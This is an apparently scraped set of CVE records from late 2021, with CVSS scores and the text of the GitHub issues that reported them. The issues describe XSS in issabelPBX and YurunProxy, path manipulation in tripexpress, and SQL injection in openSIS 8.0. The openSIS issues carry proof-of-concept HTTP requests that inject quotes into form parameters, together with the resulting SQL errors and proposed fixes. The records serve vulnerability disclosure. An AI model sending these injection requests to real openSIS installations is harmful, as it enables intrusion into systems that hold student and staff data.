{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 6.1, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 2.7, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/IssabelFoundation/issabelPBX/issues/33" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/IssabelFoundation/issabelPBX/issues/33" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:issabel:pbx:2.11:*:*:*:*:*:*:*", "matchCriteriaId": "BA2BC7AA-F116-4605-BD1D-C1B695E4685A", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "79" ]
79
https://github.com/IssabelFoundation/issabelPBX/issues/33
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "IssabelFoundation", "issabelPBX" ]
Hello, I would like to report for XSS vulnerability. The path of the vulnerability: In file https://github.com/IssabelFoundation/issabelPBX/blob/master/backup/page.backup_restore.php ```php // line 16 $var[$k] = isset($_REQUEST[$k]) ? $_REQUEST[$k] : $v; // line 143 dbug($_SESSION['backup_restore_path'], $var); ``` In file customappsreg/functions.inc.php https://github.com/IssabelFoundation/issabelPBX/blob/master/framework/amp_conf/htdocs/admin/libraries/utility.functions.php ```php // line 296 function dbug(){ // ... $opts = func_get_args(); // ... switch (count($opts)) { case 1: $msg = $opts[0]; break; case 2: if ( is_array($opts[0]) || is_object($opts[0]) ) { $msg = $opts[0]; $dump = $opts[1]; } else { $disc = $opts[0]; $msg = $opts[1]; } break; case 3: $disc = $opts[0]; $msg = $opts[1]; $dump = $opts[2]; break; } // ... if ($dump==1) {//force output via var_dump ob_start(); var_dump($msg); $msg=ob_get_contents(); ob_end_clean(); dbug_write($msg."\n\n\n"); } elseif(is_array($msg) || is_object($msg)) { dbug_write(print_r($msg,true)."\n\n\n"); } else { dbug_write($msg."\n\n\n"); } } ``` $msg carry the value from $_REQUEST without sanitization. Then there is XSS vulnerability.
Possible XSS vilnerability
https://api.github.com/repos/IssabelFoundation/issabelPBX/issues/33/comments
1
2021-11-14T17:09:49Z
2022-07-11T19:11:14Z
https://github.com/IssabelFoundation/issabelPBX/issues/33
1,052,990,688
33
2,812
CVE-2021-43691
2021-11-29T16:15:07.550
tripexpress v1.1 is affected by a path manipulation vulnerability in file system/helpers/dompdf/load_font.php. The variable src is coming from $_SERVER["argv"] then there is a path manipulation vulnerability.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "HIGH", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/toocool/tripexpress/issues/40" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/toocool/tripexpress/issues/40" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:tripexpress_project:tripexpress:1.1:*:*:*:*:*:*:*", "matchCriteriaId": "AECA2885-0C6F-4755-9C10-84FDE144C9C0", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "22" ]
22
https://github.com/toocool/tripexpress/issues/40
[ "Exploit", "Third Party Advisory" ]
github.com
[ "toocool", "tripexpress" ]
Hello, I would like to report for path manipulation vulnerability. The path of the vulnerability. In file system/helpers/dompdf/load_font.php ```php // line 171 call_user_func_array("install_font_family", array_slice($_SERVER["argv"], 1)); ``` line 66 ```php function install_font_family($fontname, $normal, $bold = null, $italic = null, $bold_italic = null) { // ... $fonts = compact("normal", "bold", "italic", "bold_italic"); // ... // Copy the files to the font directory. foreach ($fonts as $var => $src) { // ... if ( !copy($src, $dest) ) //... } ``` The variable src is coming from $_SERVER["argv"]. Then there is path manipulation vulnerability.
Possible path manipulation vulnerability
https://api.github.com/repos/toocool/tripexpress/issues/40/comments
1
2021-11-13T17:44:22Z
2021-12-02T19:52:44Z
https://github.com/toocool/tripexpress/issues/40
1,052,733,215
40
2,813
CVE-2021-41677
2021-11-30T13:15:07.537
A SQL injection vulnerability exists in version 8.0 of openSIS when MySQL or MariaDB is used as the application database. An attacker can then issue the SQL command through the /opensis/functions/GetStuListFnc.php &Grade= parameter.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/OS4ED/openSIS-Classic/issues/202" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/OS4ED/openSIS-Classic/issues/202" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:os4ed:opensis:8.0:*:*:*:*:*:*:*", "matchCriteriaId": "20B5286C-4CFF-4710-8D23-C76669FADFE7", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "89" ]
89
https://github.com/OS4ED/openSIS-Classic/issues/202
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "OS4ED", "openSIS-Classic" ]
A SQL injection vulnerability exists in version 8.0 of openSIS when MySQL or MariaDB is used as the application database. An attacker can then issue the SQL command through the /opensis/functions/GetStuListFnc.php Grade= parameter ![image](https://user-images.githubusercontent.com/65946483/134298781-06333994-a2db-4492-93ad-29abe578c8cf.png) POC ![image](https://user-images.githubusercontent.com/65946483/134297220-46b1d087-959e-41c9-901c-7ffba17cb321.png) # REQUEST ``` POST /Modules.php?modname=students/AdvancedReport.php&modfunc=&search_modfunc=list&next_modname=students/AdvancedReport.php HTTP/1.1 Host: 192.168.21.130 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 850 Origin: http://192.168.21.130 Connection: close Referer: http://192.168.21.130/Modules.php?modname=miscellaneous/Portal.php&failed_login= Cookie: PHPSESSID=1kkijlk6rkvfn3rs91kjn5hj1i; miniSidebar=0 Upgrade-Insecure-Requests: 1 last=ad&first=a%CC%81cd&stuid=adc&altid=123&addr=dsca&grade='&section=&w_course_period_id=27&marking_period_id=&activity_id=&absences_term=FY&absences_low=&absences_high=&list_gpa=Y&gpa_term=19&gpa_low=&gpa_high=&cgpa=Y&cgpa_low=&cgpa_high=&month_include_active_date=09&day_include_active_date=01&year_include_active_date=2021&class_rank_term=CUM&class_rank_low=&class_rank_high=&letter_grade_exclude=Y&letter_grade_term=19&letter_grade%5B8%5D=Y&sql_save_session=true&mp_comment=&month_from_birthdate=&day_from_birthdate=&month_to_birthdate=&day_to_birthdate=&goal_title=&goal_description=&progress_name=&progress_description=&med_month=&med_day=&med_year=&doctors_note_comments=&type=&imm_month=&imm_day=&imm_year=&imm_comments=&ma_month=&ma_day=&ma_year=&med_alrt_title=&nv_month=&nv_day=&nv_year=&reason=&result=&med_vist_comments=&address_group=Y ``` RESPONSE ``` HTTP/1.1 200 OK Date: Wed, 22 Sep 2021 05:39:16 GMT Server: Apache/2.4.46 (Debian) Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Vary: Accept-Encoding Content-Length: 60208 Connection: close Content-Type: text/html; charset=UTF-8 [...] <b>SQL:</b></TD> <TD>SELECT COUNT(s.STUDENT_ID) AS STUDENT_COUNT FROM students s ,student_enrollment ssm LEFT OUTER JOIN student_address sam ON (ssm.STUDENT_ID=sam.STUDENT_ID AND sam.TYPE='Home Address' ) ,schedule w_ss WHERE ssm.STUDENT_ID=s.STUDENT_ID AND ssm.SYEAR='2023' AND (ssm.START_DATE IS NOT NULL AND ('2021-09-22'<=ssm.END_DATE OR ssm.END_DATE IS NULL) OR ssm.DROP_CODE=33 ) AND ssm.SYEAR='2023' AND ssm.SCHOOL_ID='1' AND w_ss.STUDENT_ID=s.STUDENT_ID AND w_ss.SYEAR=ssm.SYEAR AND w_ss.SCHOOL_ID=ssm.SCHOOL_ID AND w_ss.COURSE_PERIOD_ID='27' AND ('2021-09-22' BETWEEN w_ss.START_DATE AND w_ss.END_DATE OR w_ss.END_DATE IS NULL) AND NOT EXISTS (SELECT '' FROM student_report_card_grades sg3 WHERE sg3.STUDENT_ID=ssm.STUDENT_ID AND sg3.SYEAR=ssm.SYEAR AND sg3.REPORT_CARD_GRADE_ID IN ('8')AND sg3.MARKING_PERIOD_ID='19' ) AND s.IS_DISABLE IS NULL AND ssm.STUDENT_ID = 'adc' AND LOWER(s.ALT_ID) LIKE '123%' AND LOWER(s.LAST_NAME) LIKE 'ad%' AND LOWER(s.FIRST_NAME) LIKE 'ácd%' AND ssm.GRADE_ID IN(SELECT id FROM school_gradelevels WHERE title=NULL'') AND (LOWER(sam.STREET_ADDRESS_1) LIKE '%dsca%' OR LOWER(sam.CITY) LIKE 'dsca%' OR LOWER(sam.STATE)='dsca' OR ZIPCODE LIKE 'dsca%')</TD> </TR> </TR><TR> <TD align=right><b>Traceback:</b></TD> <TD>/var/www/opensis/functions/GetStuListFnc.php at 680</TD> </TR> </TR><TR> <TD align=right><b>Additional Information:</b></TD> <TD>You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ''') AND (LOWER(sam.STREET_ADDRESS_1) LIKE '%dsca%' OR LOWER(sam.CITY) LIKE 'd...' at line 1</TD> </TR> [...] ``` SOLUTION Use function sqlSecurityFilter() before assign $_REQUEST['grade'] to query. the code should look like: ``` if ($_REQUEST['grade']) { $grade=sqlSecurityFilter($_REQUEST['grade']) $allSQL .= ' AND ssm.GRADE_ID IN(SELECT id FROM school_gradelevels WHERE title= \'' . singleQuoteReplace("'", "\'", $grade . '\')'; } ```
SQL injection in multiple functions
https://api.github.com/repos/OS4ED/openSIS-Classic/issues/202/comments
5
2021-09-22T07:15:59Z
2023-01-02T07:13:23Z
https://github.com/OS4ED/openSIS-Classic/issues/202
1,003,921,724
202
2,814
CVE-2021-41678
2021-11-30T14:15:07.830
A SQL injection vulnerability exists in version 8.0 of openSIS when MySQL or MariaDB is used as the application database. An attacker can then issue the SQL command through the /opensis/modules/users/Staff.php, staff{TITLE] parameter.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/OS4ED/openSIS-Classic/issues/203" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/OS4ED/openSIS-Classic/issues/203" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:os4ed:opensis:8.0:*:*:*:*:*:*:*", "matchCriteriaId": "20B5286C-4CFF-4710-8D23-C76669FADFE7", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "89" ]
89
https://github.com/OS4ED/openSIS-Classic/issues/203
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "OS4ED", "openSIS-Classic" ]
A SQL injection vulnerability exists in version 8.0 of openSIS when MySQL or MariaDB is used as the application database. An attacker can then issue the SQL command through the /opensis/modules/users/Staff.php, staff[TITLE] parameter. ![image](https://user-images.githubusercontent.com/65946483/134302207-1037fba8-0934-4987-acdb-9482069ebd1a.png) ![image](https://user-images.githubusercontent.com/65946483/134302281-338b2e67-582d-4784-98c5-7f85bad712ed.png) POC ![image](https://user-images.githubusercontent.com/65946483/134302347-753e30a6-1b84-4aa9-bc79-6a194ad2c026.png) REQUEST ``` POST /Modules.php?modname=users/Staff.php&include=DemographicInfoInc&category_id=1&modfunc=update HTTP/1.1 Host: 192.168.21.130 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: multipart/form-data; boundary=---------------------------42647140374471146523868129 Content-Length: 132296 Origin: http://192.168.21.130 Connection: close Referer: http://192.168.21.130/Modules.php?modname=miscellaneous/Portal.php&failed_login=1 Cookie: PHPSESSID=1kkijlk6rkvfn3rs91kjn5hj1i; miniSidebar=0 Upgrade-Insecure-Requests: 1 -----------------------------42647140374471146523868129 Content-Disposition: form-data; name="staff[TITLE]" ' -----------------------------42647140374471146523868129 Content-Disposition: form-data; name="staff[FIRST_NAME] -----------------------------42647140374471146523868129 Content-Disposition: form-data; name="staff[MIDDLE_NAME]" -----------------------------42647140374471146523868129 Content-Disposition: form-data; name="staff[LAST_NAME]" -----------------------------42647140374471146523868129 Content-Disposition: form-data; name="staff[NAME_SUFFIX]" -----------------------------42647140374471146523868129 Content-Disposition: form-data; name="staff[ALTERNATE_ID]" -----------------------------42647140374471146523868129 Content-Disposition: form-data; name="staff[GENDER]" -----------------------------42647140374471146523868129 Content-Disposition: form-data; name="month_staff[BIRTHDATE]" -----------------------------42647140374471146523868129 Content-Disposition: form-data; name="day_staff[BIRTHDATE]" -----------------------------42647140374471146523868129 Content-Disposition: form-data; name="year_staff[BIRTHDATE]" -----------------------------42647140374471146523868129 Content-Disposition: form-data; name="staff[ETHNICITY_ID]" -----------------------------42647140374471146523868129 Content-Disposition: form-data; name="staff[PRIMARY_LANGUAGE_ID]" -----------------------------42647140374471146523868129 Content-Disposition: form-data; name="staff[SECOND_LANGUAGE_ID]" -----------------------------42647140374471146523868129 Content-Disposition: form-data; name="staff[THIRD_LANGUAGE_ID]" -----------------------------42647140374471146523868129 Content-Disposition: form-data; name="staff[EMAIL]" -----------------------------42647140374471146523868129 Content-Disposition: form-data; name="staff[PHYSICAL_DISABILITY]" N -----------------------------42647140374471146523868129 Content-Disposition: form-data; name="staff[DISABILITY_DESC]" -----------------------------42647140374471146523868129 Content-Disposition: form-data; name="file"; filename="alf\'a.php" Content-Type: image/png -----------------------------42647140374471146523868129 Content-Disposition: form-data; name="imgblob" -----------------------------42647140374471146523868129 Content-Disposition: form-data; name="upbtn" UPLOAD -----------------------------42647140374471146523868129-- ``` RESPONSE ``` HTTP/1.1 200 OK Date: Wed, 22 Sep 2021 05:39:16 GMT Server: Apache/2.4.46 (Debian) Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Vary: Accept-Encoding Content-Length: 60208 Connection: close Content-Type: text/html; charset=UTF-8 […] <TD>INSERT INTO staff (CURRENT_SCHOOL_ID,TITLE,PHYSICAL_DISABILITY) values(1,'\''','N')</TD> </TR> </TR><TR> <TD align=right><b>Traceback:</b></TD> <TD>/var/www/opensis/modules/users/Staff.php at 590</TD> </TR> </TR><TR> <TD align=right><b>Additional Information:</b></TD> <TD>You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near 'N')' at line 1</TD> </TR> </TABLE> <TABLE CELLSPACING=10 BORDER=0> […] ``` SOLUTION Use function sqlSecurityFilter() before assign $_REQUEST['staff'] to $value param. ``` $staffs=sqlSecurityFilter($_REQUEST['staff']); foreach ($staffs as $column => $value) { if ($column == 'BIRTHDATE' && $value!='') { $value = date("Y-m-d", strtotime($value)); } ```
SQL injection in function STAFF.PHP
https://api.github.com/repos/OS4ED/openSIS-Classic/issues/203/comments
3
2021-09-22T08:17:21Z
2023-01-02T07:13:01Z
https://github.com/OS4ED/openSIS-Classic/issues/203
1,003,989,113
203
2,815
CVE-2021-41679
2021-11-30T14:15:08.033
A SQL injection vulnerability exists in version 8.0 of openSIS when MySQL or MariaDB is used as the application database. An attacker can then issue the SQL command through the /opensis/modules/grades/InputFinalGrades.php, period parameter.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/OS4ED/openSIS-Classic/issues/204" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/OS4ED/openSIS-Classic/issues/204" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:os4ed:opensis:8.0:*:*:*:*:*:*:*", "matchCriteriaId": "20B5286C-4CFF-4710-8D23-C76669FADFE7", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "89" ]
89
https://github.com/OS4ED/openSIS-Classic/issues/204
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "OS4ED", "openSIS-Classic" ]
A SQL injection vulnerability exists in version 8.0 of openSIS when MySQL or MariaDB is used as the application database. An attacker can then issue the SQL command through the /opensis/modules/grades/InputFinalGrades.php, period parameter. ![image](https://user-images.githubusercontent.com/65946483/134312067-05118737-39b5-4d5e-b095-2cb97e22a651.png) POC: ![image](https://user-images.githubusercontent.com/65946483/134312317-a4eccf29-0921-4937-8e0e-835575ecc024.png) REQUEST: GET /Modules.php?modname=users/TeacherPrograms.php?include=grades/InputFinalGrades.php&include_inactive=&modfunc=gradebook&mp=21&use_percents=true&period=2'6 HTTP/1.1 Host: 192.168.21.130 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: close Referer: http://192.168.21.130/Modules.php?modname=miscellaneous/Portal.php&failed_login= Cookie: PHPSESSID=1kkijlk6rkvfn3rs91kjn5hj1i; miniSidebar=0 Upgrade-Insecure-Requests: 1 RESPONSE: HTTP/1.1 200 OK Date: Wed, 22 Sep 2021 05:39:16 GMT Server: Apache/2.4.46 (Debian) Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Vary: Accept-Encoding Content-Length: 60208 Connection: close Content-Type: text/html; charset=UTF-8 […] SQL:</b></TD> <TD>SELECT cp.BEGIN_DATE,cp.MARKING_PERIOD_ID FROM course_periods cp,course_period_var cpv WHERE cpv.COURSE_PERIOD_ID=cp.COURSE_PERIOD_ID AND cpv.ID=2\'6</TD> </TR> </TR><TR> <TD align=right><b>Traceback:</b></TD> <TD>/var/www/opensis/modules/grades/InputFinalGrades.php at 55</TD> </TR> </TR><TR> <TD align=right><b>Additional Information:</b></TD> <TD>You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near '\'6' at line 1</TD> </TR> […] SOLUTION: Use function sqlSecurityFilter() before assign $_REQUEST['period'] into query "SELECT". `$period = sqlSecurityFilter($_REQUEST['period']);` ![image](https://user-images.githubusercontent.com/65946483/134313713-da33c67e-504b-4f1c-813d-45e0797e5b50.png)
SQL INJECTION IN FUNCTION /INPUTFINALGRADES.PHP
https://api.github.com/repos/OS4ED/openSIS-Classic/issues/204/comments
3
2021-09-22T08:56:02Z
2023-01-02T07:12:45Z
https://github.com/OS4ED/openSIS-Classic/issues/204
1,004,035,839
204
2,816
CVE-2021-43690
2021-12-01T13:15:07.543
YurunProxy v0.01 is affected by a Cross Site Scripting (XSS) vulnerability in src/Client.php. The exit function will terminate the script and print a message which have values from the socket_read.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 6.1, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 2.7, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/Yurunsoft/YurunProxy/issues/3" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/Yurunsoft/YurunProxy/issues/3" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:yurunproxy_project:yurunproxy:0.01:*:*:*:*:*:*:*", "matchCriteriaId": "DB65E479-CFA6-4BBE-9F9C-D9A7CA0DC078", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "79" ]
79
https://github.com/Yurunsoft/YurunProxy/issues/3
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "Yurunsoft", "YurunProxy" ]
Hello, I would like to report to XSS vulnerability. The path. In file src/Client.php line 30 ```php while(false !== $receiveResult = socket_read($socket, 2048, PHP_NORMAL_READ)) { $receiveContent .= $receiveResult; // ... $data = $this->parser->receive($receiveContent); // ... } ``` In file src/ClientParser.php line 24 ```php public function receive($data) { $data = $this->parseData($data); switch($data['a']) { // ... case ServerAction::INIT_RESPONSE: $this->worker->initResponse($data['data']); break; } } public function parseData($data) { return json_decode(substr($data, 0, -2), true); } ``` In file src/ClientWorker.php line 98 ```php public function initResponse($data) { if(!$data['success']) { exit('Error: ' . $data['message']); } } ``` Exit function will terminate the script and print a message which have values from the socket_read. Which will lead to XSS vulnerability.
Possible XSS vulnerability
https://api.github.com/repos/Yurunsoft/YurunProxy/issues/3/comments
1
2021-11-13T17:22:16Z
2021-12-02T19:52:56Z
https://github.com/Yurunsoft/YurunProxy/issues/3
1,052,729,041
3
2,817
CVE-2021-43689
2021-12-01T15:15:07.657
manage (last update Oct 24, 2017) is affected by a Cross Site Scripting (XSS) vulnerability in Application/Home/Controller/GoodsController.class.php. The exit function will terminate the script and print a message which have values from $_POST.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 6.1, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 2.7, "source": "nvd@nist.gov", "type": "Primary" } ], 